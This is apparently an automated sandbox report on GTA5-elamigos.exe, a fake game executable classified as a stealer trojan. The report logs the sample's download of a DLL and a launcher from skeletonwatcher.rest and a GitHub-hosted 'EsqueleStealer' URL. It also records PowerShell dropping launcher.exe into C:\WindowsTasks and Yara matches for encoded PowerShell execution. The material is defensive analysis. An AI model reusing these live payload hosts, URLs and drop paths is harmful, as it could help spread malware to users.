HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 07 Jan 2025 21:14:10 GMTContent-Type: application/zipContent-Length: 79147321Connection: keep-aliveContent-Disposition: attachment; filename=EsqueleSquad.zipLast-Modified: Thu, 21 Nov 2024 23:27:10 GMTCache-Control: no-store, no-cache, must-revalidate, proxy-revalidateCache-Control: no-storeETag: "1732231630.572999-79147321-2145064444"Expires: 0Pragma: no-cacheAccess-Control-Allow-Origin: http://localhost:5173Vary: Origincf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PgMkGbjAW4J6K2Bd0Owy8ihmBLmFpGjmE%2BFTtMCc95guIcPjXg%2BdPIWyZRxNq9hnCYi1x80J%2B8JZP%2FkF9u4rpvKRzfhN0%2Bi3Nc5jkbz%2F%2BE%2BnoaHqBgPrSanQ10Xxj0EUS8fZl3x4PQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe6f4b3af58422f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1643&rtt_var=821&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=121&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 50 4b 03 04 14 00 08 00 08 00 3b 03 76 59 00 00 00 00 00 00 00 00 00 da b7 04 0c 00 20 00 6c 61 75 6e 63 68 65 72 2e 65 78 65 55 54 0d 00 07 82 c1 3f 67 b3 c1 3f 67 82 c1 3f 67 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 cc bd 7d 7c 14 d5 d5 38 be b3 bb 09 01 22 b3 68 d4 58 51 c2 e3 da 66 2a 6a a2 a8 ec Data Ascii: PK;vY launcher.exeUT?g?g?gux}|8"hXQf*j

Source: global traffic

HTTP traffic detected: GET /api/get/dll HTTP/1.1accept: */*user-agent: Deno/1.6.3accept-encoding: gzip, brhost: skeletonwatcher.rest

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: skeletonwatcher.rest

Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: GTA5-elamigos.exe	String found in binary or memory: http://man7.org/linux/man-pages/man2/shutdown.2.html
Source: GTA5-elamigos.exe	String found in binary or memory: http://my.json.host/data.json
Source: powershell.exe, 00000003.00000002.2171606551.000001B01779E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171606551.000001B0178E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2338046600.000001DAD1D7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2294693432.000001DAC1F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2157122606.000001B007731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2294693432.000001DAC1D16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GTA5-elamigos.exe, 00000000.00000003.2359496807.0000024F20456000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2362578326.0000024F20456000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2358645571.0000024F20456000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2360587322.0000024F20456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://skeletonwatcher.rest/api/get/dll
Source: GTA5-elamigos.exe	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000007.00000002.2294693432.000001DAC1F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: powershell.exe, 00000003.00000002.2157122606.000001B007731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2294693432.000001DAC1D16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D91E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://crbug.com/v8/8520
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D91E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://crbug.com/v8/8520turbo_fast_api_callsenable
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/manual
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/manual/linking_to_external_code/import_maps
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/manual/runtime/compiler_apis#denobundle).
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/examples/cat.ts
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/examples/colors.ts
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/examples/colors.tsGenerate
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/examples/welcome.ts
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/fmt/colors.ts
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/fs/utils.ts
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/http/file_server.ts
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/std/testing/asserts.ts
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/x/
Source: GTA5-elamigos.exe	String found in binary or memory: https://deno.land/x/example/types.d.ts
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deno.land:80
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/)
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Compile
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Instanc
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErr
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Module)
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Runtime
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compile
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/instant
Source: GTA5-elamigos.exe	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validat
Source: GTA5-elamigos.exe	String found in binary or memory: https://dl.deno.land/canary-latest.txt
Source: GTA5-elamigos.exe	String found in binary or memory: https://dl.deno.land/canary/
Source: GTA5-elamigos.exe	String found in binary or memory: https://dl.deno.land/canary/P
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-invoke
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dom.spec.whatwg.org/#concept-event-path-append
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dom.spec.whatwg.org/#concept-shadow-including-inclusive-ancestor
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dom.spec.whatwg.org/#event-path
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dom.spec.whatwg.org/#get-the-parent
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dom.spec.whatwg.org/#retarget
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#body-mixin
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#concept-construct-readablestream
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#concept-filtered-response-basic
Source: GTA5-elamigos.exe, 00000000.00000003.2358645571.0000024F20456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#concept-heade
Source: GTA5-elamigos.exe, 00000000.00000003.2359496807.0000024F20456000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2362578326.0000024F20456000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2363366287.0000024F20462000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2360587322.0000024F20456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#concept-headeP
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-append
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-fill
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#concept-network-error
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#cors-safelisted-response-header-name
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#dom-headers
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#forbidden-response-header-name
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata
Source: GTA5-elamigos.exe	String found in binary or memory: https://github.com/Microsoft/TypeScript/issues/2577)
Source: powershell.exe, 00000007.00000002.2294693432.000001DAC1F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: GTA5-elamigos.exe	String found in binary or memory: https://github.com/WICG/import-maps#the-import-mapSet
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/beatgammit/base64-js
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/beatgammit/base64-js/issues/42
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/bitinn/node-fetch/blob/master/src/headers.js
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/clap-rs/clap/issues
Source: GTA5-elamigos.exe	String found in binary or memory: https://github.com/ctz/webpki-roots
Source: GTA5-elamigos.exe	String found in binary or memory: https://github.com/denoland/deno/issues
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/denoland/deno/issues/4591)
Source: GTA5-elamigos.exe	String found in binary or memory: https://github.com/denoland/deno/releases
Source: GTA5-elamigos.exe	String found in binary or memory: https://github.com/denoland/deno/tree/master/test_plugin
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/github/fetch/blob/master/fetch.js
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/golang/go/blob/master/LICENSE
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/inexorabletash/text-encoding
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp, GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2185641806.000001E408502000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2339896896.000001E408502000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2186656296.000001E408502000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/vadimg/js_bintrees.
Source: powershell.exe, 00000003.00000002.2157122606.000001B008363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2294693432.000001DAC2943000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: GTA5-elamigos.exe	String found in binary or memory: https://golang.org/pkg/bytes/#Buffer).
Source: GTA5-elamigos.exe	String found in binary or memory: https://golang.org/pkg/bytes/#Buffer.Grow).
Source: GTA5-elamigos.exe	String found in binary or memory: https://golang.org/pkg/bytes/#Buffer.ReadFrom).
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://golang.org/pkg/io/#pkg-constants
Source: GTA5-elamigos.exe	String found in binary or memory: https://myserver.com
Source: GTA5-elamigos.exe	String found in binary or memory: https://no-color.org/
Source: powershell.exe, 00000003.00000002.2171606551.000001B01779E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171606551.000001B0178E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2338046600.000001DAD1D7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: GTA5-elamigos.exe, 00000000.00000003.2185641806.000001E408482000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2195707519.0000024F20461000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2191642086.0000024F20461000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt
Source: GTA5-elamigos.exe, 00000000.00000003.2185641806.000001E408482000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2192321844.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2191437630.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2337536086.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt):
Source: GTA5-elamigos.exe, 00000000.00000003.2358997536.0000024F1EA37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt9
Source: GTA5-elamigos.exe, 00000000.00000003.2358997536.0000024F1EA37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt9a
Source: GTA5-elamigos.exe	String found in binary or memory: https://some/file.ts
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://streams.spec.whatwg.org/
Source: GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2046#section-5.1
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#idna
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#port-state
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: GTA5-elamigos.exe	String found in binary or memory: https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.
Source: GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/FileAPI/
Source: GTA5-elamigos.exe	String found in binary or memory: https://w3c.github.io/permissions/#permission-descriptor
Source: GTA5-elamigos.exe	String found in binary or memory: https://w3c.github.io/permissions/#permission-registry
Source: GTA5-elamigos.exe	String found in binary or memory: https://w3c.github.io/permissions/#permissionstatus
Source: GTA5-elamigos.exe	String found in binary or memory: https://w3c.github.io/permissions/#status-of-a-permission
Source: GTA5-elamigos.exe	String found in binary or memory: https://w3c.github.io/user-timing)
Source: GTA5-elamigos.exe	String found in binary or memory: https://wicg.github.io/import-maps/
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp, GTA5-elamigos.exe, 00000000.00000003.2358997536.0000024F1EA37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: GTA5-elamigos.exe	String found in binary or memory: https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml
Source: GTA5-elamigos.exe	String found in binary or memory: https://www.npmjs.com/package/tslib).
Source: GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rapidtables.com/convert/color/hsl-to-rgb.html

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2860, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe

Jump to dropped file

Source: C:\Users\user\Desktop\GTA5-elamigos.exe	File created: C:\WindowsTasks	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	File created: C:\WindowsTasks\Updates	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	File created: C:\WindowsTasks\Platform	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	File created: C:\WindowsTasks\Updates\Update-m876kK3CBP.zip	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\WindowsTasks\Platform\App-rRrqar5TwQ	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF848F2D805		3_2_00007FF848F2D805
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF848F2D77C		3_2_00007FF848F2D77C

Source: launcher.exe.13.dr

Static PE information: Number of sections : 12 > 10

Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: originalTextSpanoriginalFileNamecontextSpanoriginalContextSpanprefixTextsuffixTextstruct RenameLocationstruct RenameLocation with 8 elements vs GTA5-elamigos.exe
Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: originalTextSpanoriginalFileNamecontextSpanoriginalContextSpanprefixTextsuffixTextstruct RenameLocationstruct RenameLocation with 8 elements_ vs GTA5-elamigos.exe
Source: GTA5-elamigos.exe, 00000000.00000000.2022074603.00007FF70DC3C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEsqueleSoftware.exeD vs GTA5-elamigos.exe

Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Commandline size = 3421
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Commandline size = 3421
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Commandline size = 3421	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Commandline size = 3421	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2860, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6784, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@18/25@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03

